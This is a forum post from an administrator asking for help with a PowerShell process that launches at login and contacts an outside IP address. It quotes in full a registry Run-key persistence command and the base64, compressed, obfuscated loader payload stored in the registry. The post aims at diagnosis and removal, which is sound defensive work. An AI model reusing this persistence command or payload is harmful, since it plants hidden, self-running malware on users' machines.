none
Suspicious Powershell Activity RRS feed

  • คำถาม

  • Hello,

    We've found a powershell process that recently has started launching when a user logs in, and it appears to be communicating with an outside IP address - not associated with our company at all.  I haven't been able to find the source for this besides two entries in the registry that keep reappearing.

    The registry keys are as follows:

    In HKLM/Software/Microsoft/Windows/CurrentVersion/Run:

    PowerShellAD - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc $x"

    In HKLM/Software/Microsoft/Windows/CurrentVersion:

    Certificate - cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcASABZADUAQgBTADgATgBBAEUASQBYAC8AeQBoADcARQB0AG8AZABzAEUASQB4AEsAUQB2AEEAUQByAFkAaQAwAEYAbABxAHEASQBCADQAbQBtAHoARQBkAHMAOQBrAEoAawA2AG0AbABpAFAALwBkAEoASwBmADMAbQBQAGYAeAA1AG4AMQBzAHoANwAxAGkAYQA5AGUAbwBkAG8AdgB5AFEAdwA0ADMAVABFAEYAWABFAEsAQgBHACsAVQB6AFQAOABZAHAAUwBvAEMAaAA5AGsAUQBQAEYAUABYAGkAcQBRAEkAbABEAEEAZAA2AFgANABCAHEAVABtADEAOQB6AG8AWABKAEUAOAA1AGUAWgA1ADgAZAAzAE0AMQAvAGoASwBYAG8AdAB2ADkARwBwAEcAYQB2AGYAcwBDAHcAOABZAGQAQwBGAGYAZQBCAFQAOABBAHoAVgBWAG8AVgBDAFAAWgA4AGQAVgBMAHMAKwBqAGUAUAByAHgAQwBZADMAOQBqAGEAeABWADMAZABKADMARAB1AGgAVAB1ACsAcAB5AGcAVgBDAHgAZQAxAGwAZwBCAGIAegBCAHMAKwBlADYAOQBrAGkATQAwACsAbwAwAFEAcwBPADAANABVAGIANwBEAE8AegBJAC8AVQBZAHIAVABpAFEAcwBtAFIAbQBlAEQAYwBRAEUAMQBZAGMAaABGAHUAYwA3AEgASQA1AHkAUgA2AE8AZgBzAHkAYwBwADIANQBDAE4AOQB6AHIAUAB3AD0APQAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA

    Below is a screenshot of the processes that start when logging in:

    Powershell processes

    For the time being, we've put in place a rule to prevent Powershell from running, but we need help finding the source of this and removing it.

    So far, virus scans and root-kit scans are not finding anything, but we're also preventing this from running so it may not find anything.

    Any help would be appreciated.

    Thank you,

    Todd

    25 กรกฎาคม 2559 15:03

ตอบทั้งหมด